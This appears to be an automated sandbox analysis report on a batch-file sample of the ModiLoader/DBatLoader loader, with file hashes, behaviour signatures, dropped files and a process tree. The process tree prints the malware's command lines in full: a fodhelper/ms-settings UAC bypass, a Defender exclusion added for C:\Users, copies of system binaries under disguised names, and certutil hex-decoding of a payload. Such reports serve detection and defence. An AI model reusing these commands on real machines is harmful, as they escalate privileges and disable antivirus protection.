Analysis

  • max time kernel
    136s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    26-03-2024 02:59

General

  • Target

    e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat

  • Size

    2.9MB

  • MD5

    0acc894a421b72f77d8f825865710ec4

  • SHA1

    e51bfe768ece4a254a5f85c977fa65dfa963c3b8

  • SHA256

    e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e

  • SHA512

    4faafabc07bf132657e54b4107b97dc339143439a26802589a5aae94325e38e2a37766a647baa42b1a6ee069aa2bae3f6ffc12eb6b5c7fac64a7ee06cd169f02

  • SSDEEP

    24576:yn8Rm6aVrLy7bOkM75parJLzx60bCNB0PEsNl36h3vKYtKYKCgsX9t6HtzA6GC89:KomdNy7bOT5u9zgApY

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ModiLoader Second Stage 1 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\system32\cmd.exe
      cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\system32\extrac32.exe
        extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
        3⤵
          PID:3004
      • C:\Users\Public\alpha.exe
        C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Windows\system32\extrac32.exe
          extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
          3⤵
            PID:3020
        • C:\Users\Public\alpha.exe
          C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2604
          • C:\Windows\system32\extrac32.exe
            extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
            3⤵
              PID:2636
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2724
            • C:\Users\Public\xkn.exe
              C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
              3⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2720
              • C:\Users\Public\alpha.exe
                "C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                4⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2972
                • C:\Windows\system32\reg.exe
                  reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
                  5⤵
                  • Modifies registry class
                  • Modifies registry key
                  PID:2628
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 9
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2412
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\e03f365bff6dc4429c91f0ebd0bfdbf6eadaeb3c3cf4b3b30ecb8e9797f46c5e.bat" "C:\\Users\\Public\\Lewxa.txt" 9
              3⤵
              • Executes dropped EXE
              PID:2424
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Users\Public\kn.exe
              C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
              3⤵
              • Executes dropped EXE
              PID:2532
          • C:\Users\Public\Libraries\Lewxa.com
            C:\\Users\\Public\\Libraries\\Lewxa.com
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:1904
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1904 -s 752
              3⤵
              • Loads dropped DLL
              • Program crash
              PID:2696
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:312
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2392
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:1956
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
            2⤵
            • Executes dropped EXE
            PID:2788
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
            2⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettings.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2792
          • C:\Users\Public\alpha.exe
            C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
            2⤵
            • Executes dropped EXE
            PID:2936
            • C:\Windows\system32\taskkill.exe
              taskkill /F /IM SystemSettingsAdminFlows.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1984

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Public\Lewxa.txt

          Filesize

          130KB

          MD5

          d74d9148a2533e8fd2c55f7f78d464ad

          SHA1

          8a207d8d2ac8e0a6f06cdb38a62af62f16dd97ef

          SHA256

          cfd3ae792012746b73f3173b459e933062c8a04505404fa36365ad735a4eda75

          SHA512

          27f71cb70d268034fedbddef821395a4eacbf082e42d0493db16c179feb719d1da2919aa43eadfaa6e95265c0bbb83050ab9dc80ca5ea15e6adee71eb2c41d2e

        • C:\Users\Public\Libraries\Lewxa.com

          Filesize

          1.0MB

          MD5

          701a1b8de275a64ad562d862d7e117d4

          SHA1

          a6dcd9f802a20fa07bd2f569b0761244ab5803a7

          SHA256

          f5ad3a45f4bea88e28aa2c541ee13ab28fa68a29af572ce2ca02960464d601ad

          SHA512

          085a5becd2c1ceac9a0dfefdc0dc663d598062b2bfef24e3709b0998924f98836eaa0d66bc21dbda9842fead17443fbd3b69febd620639b8e1921d3b0e797a32

        • \Users\Public\alpha.exe

          Filesize

          337KB

          MD5

          5746bd7e255dd6a8afa06f7c42c1ba41

          SHA1

          0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

          SHA256

          db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

          SHA512

          3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

        • \Users\Public\kn.exe

          Filesize

          1.1MB

          MD5

          ec1fd3050dbc40ec7e87ab99c7ca0b03

          SHA1

          ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

          SHA256

          1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

          SHA512

          4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

        • \Users\Public\xkn.exe

          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

        • memory/1904-57-0x0000000000400000-0x000000000050F000-memory.dmp

          Filesize

          1.1MB

        • memory/1904-56-0x0000000000380000-0x0000000000381000-memory.dmp

          Filesize

          4KB

        • memory/1904-54-0x0000000002EC0000-0x0000000003EC0000-memory.dmp

          Filesize

          16.0MB

        • memory/1904-52-0x0000000002EC0000-0x0000000003EC0000-memory.dmp

          Filesize

          16.0MB

        • memory/1904-46-0x0000000000380000-0x0000000000381000-memory.dmp

          Filesize

          4KB

        • memory/2720-22-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2720-31-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2720-30-0x0000000002540000-0x00000000025C0000-memory.dmp

          Filesize

          512KB

        • memory/2720-28-0x000007FEF5390000-0x000007FEF5D2D000-memory.dmp

          Filesize

          9.6MB

        • memory/2720-29-0x0000000002540000-0x00000000025C0000-memory.dmp

          Filesize

          512KB

        • memory/2720-23-0x0000000002540000-0x00000000025C0000-memory.dmp

          Filesize

          512KB

        • memory/2720-21-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

          Filesize

          32KB

        • memory/2720-20-0x000000001B1A0000-0x000000001B482000-memory.dmp

          Filesize

          2.9MB